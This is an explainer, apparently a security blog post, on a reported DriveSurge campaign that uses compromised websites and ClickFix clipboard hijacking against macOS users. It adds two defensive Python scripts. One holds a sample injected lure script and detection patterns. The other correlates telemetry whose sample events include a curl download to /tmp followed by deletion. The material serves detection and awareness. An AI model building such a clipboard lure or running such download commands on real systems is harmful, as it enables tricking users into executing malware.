Security researchers at Silent Push recently published research on a threat actor they call DriveSurge, a malware delivery operation that uses compromised legitimate websites to push fake browser updates and ClickFix-style attacks. The campaign is notable because it does not rely only on suspicious domains or obvious phishing pages. Instead, it abuses websites people may already trust.
What Is DriveSurge?
DriveSurge is described by Silent Push as a threat actor using compromised websites to route visitors toward malware delivery pages. The researchers believe the group may operate like an Initial Access Broker, meaning its role is to generate infected systems or victim leads that can later be used by other criminals. Silent Push also suspects a pay-per-install model, where successful infections have direct value to the operator.
The important point is that DriveSurge does not need to trick users into visiting an obviously malicious website. A victim may start on a normal business, professional, or local organization website that has been silently compromised.
How the Attack Works
The campaign uses a traffic distribution system, often called a TDS, to decide what a visitor should see. A TDS can profile a visitor's browser, operating system, location, and other traits, then choose whether to show a malicious page, redirect the visitor, or do nothing. Silent Push reports that DriveSurge uses an open-source TDS called zTDS.
From the user's perspective, the attack may look like one of two familiar scenarios.
The first is a fake browser update. The victim sees a page that appears to come from a known browser and is told they need to update before continuing. Silent Push observed fake update behavior impersonating multiple common browsers.
The second is a ClickFix attack. Instead of offering a download, the page claims there is a problem that the user can fix by copying and running a command. This is social engineering dressed up as troubleshooting. The user believes they are completing a security check or fixing a browser issue, but they are actually being guided into executing malware.
The macOS Angle
One of the more interesting parts of the research involves an obfuscated JavaScript payload that specifically targeted desktop macOS users. Silent Push found that the script checked the visitor's environment first, looking for macOS while excluding mobile Apple devices such as iPhones and iPads.
That matters because the lure depends on instructions that only make sense on a Mac. The page can tell the victim to use Spotlight, open Terminal, and paste a "verification" command. If the same instructions appeared on a phone, the scam would immediately look broken. By filtering for the right environment, the attacker makes the fake prompt feel more believable.
Clipboard Hijacking: The Core Trick
The most dangerous part of the flow is the clipboard manipulation.
The victim sees something that looks like a verification prompt, such as a fake "I'm not a robot" check. When they click it, the page silently writes a malicious command to the clipboard. The page then tells the user to open Terminal and paste what they believe is a verification code. Silent Push describes this as clipboard hijacking, where the copied content is not what the user thinks it is.
This is effective because it bypasses the normal mental model many users have about web security. People often assume that a website cannot directly run commands on their computer. That is mostly true. But the attacker does not need the browser to run the command. They convince the user to do it manually.
The browser is not exploiting macOS directly. The web page is exploiting trust, urgency, and habit.
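As an added example (not Silent Push's code or anything from the campaign itself), the following script shows how a site owner or responder can scan a page's inline scripts for the pattern described above: a clipboard write paired with a "paste this into Terminal" lure, optionally gated by a desktop-macOS platform check. The indicator regexes and the sample HTML are constructed for this illustration.

```python
import re

# Indicator patterns a site owner can run over their own pages (constructed for this example).
CLIPBOARD_WRITE = re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)")
TERMINAL_LURE = re.compile(r"\b(Terminal|PowerShell|Command Prompt|Spotlight)\b", re.I)
PLATFORM_SNIFF = re.compile(r"navigator\.(platform|userAgent|userAgentData)")
EXCLUDES_MOBILE = re.compile(r"iPhone|iPad", re.I)
SCRIPT_TAG = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)


def score_script(js: str) -> dict:
    """Report which ClickFix indicators one inline script contains and a verdict."""
    hits = {
        "clipboard_write": bool(CLIPBOARD_WRITE.search(js)),
        "terminal_lure": bool(TERMINAL_LURE.search(js)),
        "platform_sniff": bool(PLATFORM_SNIFF.search(js)),
        "excludes_mobile": bool(EXCLUDES_MOBILE.search(js)),
    }
    # A clipboard write alone is normal (share buttons); paired with a shell lure it is the core trick.
    hits["verdict"] = "clickfix" if hits["clipboard_write"] and hits["terminal_lure"] else "benign"
    return hits


def scan_html(html: str) -> list:
    """Score every inline <script> block in a fetched page."""
    return [score_script(js) for js in SCRIPT_TAG.findall(html)]


# Constructed sample page: a legitimate copy-link widget followed by an injected lure.
SAMPLE_HTML = """
<script>
  // normal share button: copies the page URL to the clipboard
  btn.onclick = () => navigator.clipboard.writeText(location.href);
</script>
<script>
  var p = navigator.platform, u = navigator.userAgent;
  if (p.indexOf('Mac') === 0 && !/iPhone|iPad/.test(u)) {
    document.getElementById('robot').onclick = function () {
      navigator.clipboard.writeText('PLACEHOLDER_COMMAND');
      msg.innerText = 'Open Terminal and paste the verification code.';
    };
  }
</script>
"""

if __name__ == "__main__":
    for i, result in enumerate(scan_html(SAMPLE_HTML)):
        print(f"script {i}: {result}")
```

Real injected scripts are usually obfuscated, so run this after deobfuscating or beautifying the script, or extend the patterns to the decoded strings.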
Why This Attack Is Convincing
These attacks work because they borrow language and design from real security experiences. Users are used to CAPTCHAs, browser update prompts, access checks, and troubleshooting messages. A fake verification step does not feel unusual anymore.
The campaign also benefits from appearing on legitimate compromised websites. If a user lands on a site they recognize, they are less likely to question what happens next. The trust belongs to the original site, but the attacker borrows it.
There is also a technical reason this can be hard to spot. The injected scripts may be obfuscated, meaning the code is intentionally made difficult to read. Silent Push noted heavy obfuscation in the payload they analyzed, which helped hide the attack logic and the follow-on behavior.
What Users Should Learn From This
The main lesson is simple: a website should never ask you to paste a command into Terminal, PowerShell, Command Prompt, or any other shell to prove you are human.
A real CAPTCHA does not require Terminal. A real browser update does not require pasted shell commands. A real website error does not need you to run an encoded fix from your clipboard.
| Scenario | Safe? |
|---|---|
| A CAPTCHA asks you to click images or solve a puzzle | Normal |
| A page asks you to open Terminal and paste a command | Scam |
| A browser update prompt appears in the browser itself | Normal |
| A website asks you to paste something to "fix" a browser error | Scam |
| A "verification" step requires pressing keyboard shortcuts outside the browser | Scam |
If a site says you must run a command to continue, close the page. If you already pasted and ran something suspicious, disconnect from the network immediately and contact your IT or security team.
What Defenders Should Watch For
For security teams, the DriveSurge research is a useful reminder that malware delivery increasingly blends web compromise, traffic filtering, and user-driven execution.
Defenders should focus less on one specific indicator and more on behaviors:
| Behavior | Why It Matters |
|---|---|
| Browser sessions leading users to copy commands | Clipboard hijack precursor |
| Web pages using clipboard-writing in unusual contexts | Core delivery mechanism |
| Terminal activity shortly after browser interaction | Indicates command was pasted and run |
| Shell commands downloading files to temp locations, then deleting them | Common post-execution cleanup pattern |
| Unexpected script execution on macOS endpoints | Payload running |
| Compromised websites loading unfamiliar third-party JavaScript | Injection point |
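An added example (not Silent Push's code) of turning two rows of the table above into correlation logic over endpoint process telemetry: a Terminal launch shortly after browser activity, and a Terminal-spawned shell dropping a file in a temp directory and then deleting it. The event schema, process names, window and all sample events are constructed for this illustration.

```python
import re
from datetime import datetime

BROWSERS = {"Safari", "Google Chrome", "firefox"}
TERMINALS = {"Terminal", "iTerm2"}
WINDOW_S = 120  # a Terminal launch this soon after browser activity is worth a look
TMP_PATH = re.compile(r"/(?:private/)?tmp/[\w.\-]+|/var/folders/\S+")


def correlate(events: list) -> list:
    """events: dicts with ts, pid, ppid, proc, cmd (constructed schema); returns alert tuples."""
    alerts, last_browser, suspect_pids, dropped = [], None, set(), {}
    for e in sorted(events, key=lambda ev: ev["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        if e["proc"] in BROWSERS:
            last_browser = ts  # any browser event counts as "user was in the browser"
        elif e["proc"] in TERMINALS:
            suspect_pids.add(e["pid"])
            if last_browser and (ts - last_browser).total_seconds() <= WINDOW_S:
                alerts.append(("terminal_after_browser", e["pid"]))
        elif e["ppid"] in suspect_pids:
            suspect_pids.add(e["pid"])  # shells spawned by Terminal, and their children
            m = TMP_PATH.search(e["cmd"])
            if m and e["proc"] != "rm":
                dropped[m.group(0)] = e["pid"]  # something wrote or fetched into a temp path
            elif m and m.group(0) in dropped:
                alerts.append(("temp_drop_and_cleanup", m.group(0)))
    return alerts


# Constructed telemetry: Safari activity, Terminal 41 s later, a download to /tmp, cleanup,
# then an unrelated Terminal launch half an hour later that must not alert.
SAMPLE_EVENTS = [
    {"ts": "2024-01-01T10:00:00", "pid": 100, "ppid": 1, "proc": "Safari", "cmd": "Safari"},
    {"ts": "2024-01-01T10:00:41", "pid": 200, "ppid": 1, "proc": "Terminal", "cmd": "Terminal"},
    {"ts": "2024-01-01T10:00:42", "pid": 201, "ppid": 200, "proc": "zsh", "cmd": "-zsh"},
    {"ts": "2024-01-01T10:00:50", "pid": 202, "ppid": 201, "proc": "curl",
     "cmd": "curl -s -o /tmp/update.bin http://example.invalid/placeholder"},
    {"ts": "2024-01-01T10:00:51", "pid": 203, "ppid": 201, "proc": "rm", "cmd": "rm -f /tmp/update.bin"},
    {"ts": "2024-01-01T10:30:00", "pid": 300, "ppid": 1, "proc": "Terminal", "cmd": "Terminal"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Developers open Terminal all day, so the first rule is a low-confidence signal on its own; the two alerts landing on the same Terminal lineage within a minute is what makes the pair worth escalating.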
Security awareness training should also be updated. Many users have been taught to avoid suspicious attachments and fake login pages, but fewer have been warned about fake CAPTCHA and verification pages that tell them to paste commands into Terminal or PowerShell.
Sources:
- Silent Push, "DriveSurge: Analyzing an Obfuscated Payload Leads to macOS Malware"
